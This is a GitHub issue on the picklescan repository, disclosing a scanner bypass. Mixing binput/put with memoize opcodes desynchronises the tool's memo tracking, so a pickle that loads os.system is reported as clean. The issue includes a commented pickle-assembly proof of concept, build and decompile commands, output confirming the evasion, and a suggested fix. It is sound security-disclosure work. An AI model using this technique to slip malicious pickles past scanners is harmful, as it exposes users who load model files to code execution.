mmaitre314/picklescan

Dangerous global detection bypass with memo dict confusion

dennis-doyensec opened this issue · 2 comments

Info

The picklescan tool attempts to keep track of the memo dict by parsing the
memoize opcodes whenever seen. The binput and put instructions also
insert objects into the memo but are left unhandled. While a legitimate python3
pickle should never mix *put and memoize instructions, doing so is accepted
by pickle.load.

Malware can potentially set up the memo using a mix of these opcodes so that
picklescan thinks memo[0] contains a safe module name like torch._utils
when it actually contains a dangerous one. Used in conjunction with binget
and stack_global instructions and any arbitrary python import can be made to look
safe to picklescan.

Example

The following example uses radare2 (rasm2 and r2
commands) with the r2pickledec
plugin.

This following memo.asm file is commented to explain the bypass. Comments
start with ;.

;; Dangerous strings added to memo
binstring "os"      ;; module name for os.system
binput 0            ;; memo[0] = stack[-1] = "system"
binstring "system"  ;; function name for os.system
binput 1            ;; memo[1] = stack[-1] = "system"

;; Safe strings added to memmo
binstring "torch._utils"
memoize
binstring "_rebuild_tensor_v2"
memoize

;; State of memo
;; real memmo looks like
;;; memo = {0: "os", 1: "system", 2: "torch._utils", 3: "_rebuild_tensor_v2"}
;;; picklescan's memo looks like
;;; memo = {0: "torch._utils", 1: "_rebuild_tensor_v2"}

binget 0        ;; "os" but picklescan thinks it's "torch._utils"
binget 1        ;; "system" but picklescan thinks it's "_rebuild_tensor_v2"
stack_global    ;; really: "os.system" but Picklescan thinks this is "torch._utils._rebuild_tensor_v2"
stop

The pickle can be assembled with rasm2.

$ rasm2 -a pickle -Bf memo.asm > memo.pickle

Decompiling the pickle with r2 may help with understanding.

# r2 -a pickle -qqc 'pdP' memo.pickle
## VM stack start, len 5
## VM[4]
str_x0 = "os"
## VM[3]
str_x9 = "system"
## VM[2]
str_x16 = "torch._utils"
## VM[1]
str_x28 = "_rebuild_tensor_v2"
## VM[0] TOP
return _find_class(str_x0, str_x9)

The pickle will return os.system when loaded, proving access to a
dangerous function without a detection by picklescan.

$ python3 -m pickle memo.pickle
<built-in function system>

$ picklescan -p memo.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0

Fix

A legitimate pickle that uses memoize should not use binput or put. So
the simplest fix is to mark any pickle that contains a memoize instruction
and either a binput or put instructions as dangerous.

Attempting to parse the memo without a full AST is error prone. The
r2pickledec is the only tool I am aware of that will produce a
full AST for all python pickle instructions. Running pdPj will produce the
following JSON for the above pickle.

$ r2 -a pickle -qqc 'pdPj~{}' picks/memo.pickle
{
  "stack": [
    {
      "offset": 0,
      "type": "PY_STR",
      "value": "os"
    },
    {
      "offset": 9,
      "type": "PY_STR",
      "value": "system"
    },
    {
      "offset": 22,
      "type": "PY_STR",
      "value": "torch._utils"
    },
    {
      "offset": 40,
      "type": "PY_STR",
      "value": "_rebuild_tensor_v2"
    },
    {
      "offset": 68,
      "type": "PY_GLOB",
      "value": {
        "module": {
          "offset": 0,
          "type": "PY_STR",
          "prev_seen": ".stack[0]"
        },
        "name": {
          "offset": 9,
          "type": "PY_STR",
          "prev_seen": ".stack[1]"
        }
      }
    }
  ],
  "popstack": [
  ]
}

Using r2pickledec in picklescan is possible through r2pipe but would
require adding dependencies that are not trivially installed with just pip.

I am the author of the pickle architecture in r2 and the r2pickledec
plugin. So I can offer som help if desired.

A warning on using proto for a fix

Since the offending opcodes are protocol 2 instructions, it might be tempting
to only accept them when a pickle starts with proto 2. This won't work. A
pickle can redeclare it's protocol version at will without any unpickling
error. Additionally, a pickle that has declared itself as proto 2 still has
access to protocol 4 instructions.

Thanks! Investigating.

A legitimate pickle that uses memoize should not use binput or put

If the pickle spec prohibits this, then the "simple fix" is what I'd go for.

I'll take a look on my side too!